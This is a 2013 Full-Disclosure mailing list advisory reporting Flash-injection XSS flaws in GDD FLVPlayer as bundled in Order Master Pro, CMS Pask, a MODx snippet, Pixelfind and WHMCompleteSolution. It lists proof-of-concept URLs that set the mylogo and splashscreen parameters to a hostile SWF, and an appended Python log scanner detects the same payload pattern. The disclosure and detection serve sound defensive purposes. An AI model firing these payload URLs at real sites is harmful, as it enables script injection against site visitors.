Message-ID: <005c01cea1ac$907b7560$9b7a6fd5@pc>
Date: Sun, 25 Aug 2013 19:01:46 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in multiple web applications with
GDD FLVPlayer
Hello list!
These are Content Spoofing and Cross-Site Scripting vulnerabilities in
multiple web applications with GDD FLVPlayer. Earlier I wrote about
vulnerabilities in GDD FLVPlayer
(http://seclists.org/fulldisclosure/2013/Aug/247). This is a video and audio
player, which is used at thousands of web sites and in multiple web
applications.
Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer
for MODx, Pixelfind Administrator, WHMCompleteSolution, and other web
applications. This flash video and audio player is also used at many web
sites as a standalone web application.
-------------------------
Affected products:
-------------------------
Web applications which are using GDD FLVPlayer v3.635 and previous versions
are vulnerable.
The following web applications are vulnerable:
Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).
-------------------------
Affected vendors:
-------------------------
GDD FLVPlayer was developed by GeDeDe.
GeDeDe
http://www.gdd.ro
----------
Details:
----------
XSS (via Flash Injection) (WASC-08):
Order Master Pro:
http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf
CMS Pask 3 (Pixelwerk admin):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf
gddflvplayer for MODx:
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf
Pixelfind Administrator:
http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf
WHMCompleteSolution:
http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf
These are examples of the XSS vulnerabilities; for examples of the 8 CS
vulnerabilities, see the above-mentioned advisory.
I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/6727/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
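
Added example, not part of the original advisory or of any vendor's code: a log check that flags requests to gddflvplayer.swf which set the mylogo or splashscreen parameter from the URL, at whatever path the player is installed. The Combined Log Format, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

PLAYER = "/gddflvplayer.swf"               # file name used in every advisory URL
RISKY_PARAMS = {"mylogo", "splashscreen"}  # parameters named in the advisory
# Request field of a Combined Log Format line (assumed log format).
REQ_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Aug/2013:19:02:11 +0300] "GET /player/gddflvplayer.swf?mylogo=xss.swf HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Aug/2013:19:02:14 +0300] "GET /op/video/GDDFLVPlayer.swf?SplashScreen=xss%2Eswf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Aug/2013:19:03:40 +0300] "GET /gddflvplayer.swf?splashscreen=poster.jpg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Aug/2013:19:03:41 +0300] "GET /player/gddflvplayer.swf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Aug/2013:19:03:55 +0300] "GET /index.php?mylogo=xss.swf HTTP/1.1" 200 812',
]

def classify(target):
    """Return (param, decoded value, reason) for each risky parameter in a request target."""
    path, _, query = target.partition("?")
    # Decode and lowercase the path so encoded or mixed-case file names still match.
    if not unquote(path).lower().endswith(PLAYER):
        return []
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in RISKY_PARAMS:
            # parse_qsl has already percent-decoded the value.
            is_swf = value.split("?")[0].lower().endswith(".swf")
            reason = "value is a SWF file" if is_swf else "parameter set from URL"
            hits.append((name.lower(), value, reason))
    return hits

def scan(lines):
    """Return (line number, param, value, reason) for every matching log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if match:
            findings.extend((number,) + hit for hit in classify(match.group(1)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```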